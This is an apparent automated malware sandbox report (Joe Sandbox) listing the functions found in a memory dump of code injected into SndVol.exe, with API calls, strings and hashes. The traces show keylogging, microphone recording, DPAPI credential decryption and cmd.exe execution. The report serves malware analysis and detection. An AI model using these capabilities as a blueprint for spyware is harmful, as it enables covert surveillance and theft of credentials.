__alloca_probe_16.LIBCMT ref: 0044E391
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
__freea.LIBCMT ref: 0044E3FD

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: b11d3600e2aa565fdc4ed9d3d5ae446cbeb211535541ee0462b0a0c8c7e06313
Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
Opcode Fuzzy Hash: b11d3600e2aa565fdc4ed9d3d5ae446cbeb211535541ee0462b0a0c8c7e06313
Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98

Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
waveInStart.WINMM ref: 00401CDE

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
Opcode Fuzzy Hash: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E

Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044C543
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
_free.LIBCMT ref: 0044C59F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 825181044c3797c199998a294b9de2a6dd0a27ea62f95a6f222d210b691a6f07
Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
Opcode Fuzzy Hash: 825181044c3797c199998a294b9de2a6dd0a27ea62f95a6f222d210b691a6f07
Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8

Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
int.LIBCPMT ref: 0040FBE8

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040FC28
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
Opcode Fuzzy Hash: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8

Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
_free.LIBCMT ref: 004457E3
_free.LIBCMT ref: 0044580A
SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D

Function 04926541 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0491A7A9,00000000,?,?,0491A82D,00000000,00000000,00000000,00000000,00000000,?,?), ref: 04926546
_free.LIBCMT ref: 0492657B
_free.LIBCMT ref: 049265A2
SetLastError.KERNEL32(00000000), ref: 049265AF
SetLastError.KERNEL32(00000000), ref: 049265B8

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction ID: ec520b82175ce71785997ed2480753d0e81ced0aba00b03946ba876796f1f4a5
Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction Fuzzy Hash: D70149722006323BE3126E356F44E2B266EDBD25657210535F805D259CFA74FE01D264

Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DBB4

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044DBC6
_free.LIBCMT ref: 0044DBD8
_free.LIBCMT ref: 0044DBEA
_free.LIBCMT ref: 0044DBFC

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C

Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00441566

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00441578
_free.LIBCMT ref: 0044158B
_free.LIBCMT ref: 0044159C
_free.LIBCMT ref: 004415AD

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E

Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C

Strings

[regsplt], xrefs: 00412608

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
Opcode Fuzzy Hash: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8

Function 0044B8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044B918
_free.LIBCMT ref: 0044BA35

Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 00439AC7
Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 00439ACE

Strings

., xrefs: 0044BBEC
*?, xrefs: 0044B90C

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94

Function 0492C661 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0492C6B0
_free.LIBCMT ref: 0492C7CD

Part of subcall function 0491A83B: IsProcessorFeaturePresent.KERNEL32(00000017,0491A80D,?,?,?,?,?,00000000,?,?,0491A82D,00000000,00000000,00000000,00000000,00000000), ref: 0491A83D
Part of subcall function 0491A83B: GetCurrentProcess.KERNEL32(C0000417), ref: 0491A85F
Part of subcall function 0491A83B: TerminateProcess.KERNEL32(00000000), ref: 0491A866

Strings

*?, xrefs: 0492C6A4
., xrefs: 0492C984

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
Instruction ID: 41b5fd7d0f2b20662b34d8306dd22c01034b5d6e724c406d5f31227f971873c7
Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
Instruction Fuzzy Hash: 0F518475E0022AAFDF14DFA8C980AADB7F9FF89314F244179D855E7344E771AA018B50

Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00442C15
__freea.LIBCMT ref: 00442C9B

Strings

H"G, xrefs: 00442B40, 00442B60, 00442B89, 00442C65, 00442C83
H"GH"G, xrefs: 00442B5D

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: H"G$H"GH"G
API String ID: 1635606685-3036711414
Opcode ID: e481662891375e5a2645b3b08f80f5967694cfef59df56efd529eea01ddaf1f5
Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
Opcode Fuzzy Hash: e481662891375e5a2645b3b08f80f5967694cfef59df56efd529eea01ddaf1f5
Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E

Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040189E
ExitThread.KERNEL32 ref: 004018D6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

Strings

8:G, xrefs: 00401868

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: 8:G
API String ID: 1649129571-405301104
Opcode ID: e6ba151abec5212b98bdec8079b6b2ba03e66e03ce1f94e02eb72dca0a66db1c
Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
Opcode Fuzzy Hash: e6ba151abec5212b98bdec8079b6b2ba03e66e03ce1f94e02eb72dca0a66db1c
Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E

Function 048E25E2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 048E2636
RtlExitUserThread.NTDLL(00000000), ref: 048E266E
waveInUnprepareHeader.WINMM(00001D90,00000020,00000000,?,00000020,00471E78,00000000), ref: 048E277C

Part of subcall function 049132BD: __onexit.LIBCMT ref: 049132C3

Strings

8:G, xrefs: 048E2600

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
String ID: 8:G
API String ID: 1265842484-405301104
Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
Instruction ID: 885a26408067cff8afd9d2b8cf186ac3fd7a18c77d5bc1336a9d74c2c8434d16
Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
Instruction Fuzzy Hash: F14192326142049BE314FB2EDC51ABE775DAB86319F004B6DE589C21E0DFB0B94ACB17

Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 00440975
_free.LIBCMT ref: 00440A40
_free.LIBCMT ref: 00440A4A

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 0044096C, 00440973, 004409A2, 004409DA

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\SysWOW64\SndVol.exe
API String ID: 2506810119-3942169294
Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59

Function 049216CD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 0492170D
_free.LIBCMT ref: 049217D8
_free.LIBCMT ref: 049217E2

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 04921704, 0492170B, 0492173A, 04921772

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\SysWOW64\SndVol.exe
API String ID: 2506810119-3942169294
Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction ID: 547f642c4f63aa2d79ba4c262d65830017ed6ea5025973ee6bf9a8be65a6e5ad
Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction Fuzzy Hash: 3E31B875A00228AFDB21DF95EE81D9EBBFCEBC5314F1040B6E404D7214E6706A55CB91

Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

_wcslen.LIBCMT ref: 00419744

Strings

.exe, xrefs: 00419696
program files\, xrefs: 0041972A, 00419731, 00419743
program files (x86)\, xrefs: 0041973E

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$program files (x86)\$program files\
API String ID: 37874593-1203593143
Opcode ID: 65ae59b11d5d2e675a1ca71ba125b81329312c45fdbbab87bed92ba3827f8aff
Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
Opcode Fuzzy Hash: 65ae59b11d5d2e675a1ca71ba125b81329312c45fdbbab87bed92ba3827f8aff
Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9

Function 0040A0B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
wsprintfW.USER32 ref: 0040A13F

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A0C7
], xrefs: 0040A0CC

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
Opcode Fuzzy Hash: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9

Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF

Strings

Online Keylogger Started, xrefs: 00409E4C, 00409E55, 00409E7F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
Opcode Fuzzy Hash: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE

Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
GetProcAddress.KERNEL32(00000000), ref: 00406097

Strings

crypt32, xrefs: 0040608B
CryptUnprotectData, xrefs: 00406086

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794

Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
CloseHandle.KERNEL32(?), ref: 004051AA
SetEvent.KERNEL32(?), ref: 004051B9

Strings

Connection Timeout, xrefs: 00405178

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
Opcode Fuzzy Hash: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49

Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E

Strings

ios_base::eofbit set, xrefs: 0040D24D
ios_base::badbit set, xrefs: 0040D21A
ios_base::failbit set, xrefs: 0040D240

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
Opcode Fuzzy Hash: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F

Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B

Strings

cmd.exe, xrefs: 00414870
/C , xrefs: 00414859
open, xrefs: 00414875

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
Opcode Fuzzy Hash: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
